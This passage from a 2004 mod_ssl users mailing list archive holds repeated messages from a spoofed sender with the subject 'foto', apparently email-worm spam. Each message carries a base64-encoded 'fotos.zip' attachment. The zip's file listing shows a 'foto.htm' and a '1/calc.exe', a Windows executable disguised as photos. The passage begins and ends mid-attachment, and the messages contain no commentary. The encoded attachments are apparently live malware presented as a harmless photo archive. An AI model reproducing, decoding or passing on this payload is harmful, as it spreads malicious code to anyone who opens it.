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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------xdlydiuesrhuxvebfwkh--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 15:14:36 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CE193A8963; Wed,  1 Sep 2004 15:14:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from jmanzanares.net (fw-torre.telemovil.net [200.85.0.50])
	by master.modssl.org (Postfix) with SMTP id 075B6A8934
	for ; Wed,  1 Sep 2004 15:14:31 +0200 (CEST)
Date: Wed, 01 Sep 2004 07:18:47 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------enfqpykbbpctfvjmqkcl"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------enfqpykbbpctfvjmqkcl
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------enfqpykbbpctfvjmqkcl
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------enfqpykbbpctfvjmqkcl--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 15:33:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0391EA898B; Wed,  1 Sep 2004 15:33:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from KINGKONG.net (66-205-231-2.idstelcom.net [66.205.231.2])
	by master.modssl.org (Postfix) with SMTP id 19218A8963
	for ; Wed,  1 Sep 2004 15:33:19 +0200 (CEST)
Date: Mon, 01 Sep 2003 09:33:28 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------uvdbddaizrzapihszouy"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------uvdbddaizrzapihszouy
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------uvdbddaizrzapihszouy
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
